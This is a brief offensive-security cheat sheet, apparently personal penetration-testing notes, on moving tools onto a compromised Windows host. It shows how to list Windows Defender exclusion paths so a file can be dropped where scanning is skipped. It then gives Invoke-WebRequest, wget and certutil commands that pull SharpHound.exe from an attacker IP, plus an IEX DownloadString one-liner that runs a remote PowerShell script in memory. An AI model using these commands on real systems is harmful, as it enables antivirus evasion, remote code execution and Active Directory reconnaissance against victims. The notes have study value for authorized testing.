File Transfer

First find the excluded folder from windows defender by doing

Get-MpPreference | Select-Object -ExpandProperty ExclusionPath

• Suppose C:\AD is excluded from defender then go to that directory and

Invoke-WebRequest -Uri http://tun0-ip:port/SharpHound.exe -OutFile .\SharpHound.exe

OR

wget http://172.16.99.145:8000/SharpHound.exe -O .\SharpHound.exe

OR (Certutil is not working currently)

certutil -urlcache -f -split http://tun0-ip:port/SharpHound.exe -OutFile .\SharpHound.exe

• We can also directly load powershell scripts in memory using

IEX(New-Object Net.WebClient).downloadString('http://tun0-ip:port/filename.ps1') 

see powershell-theory.md section.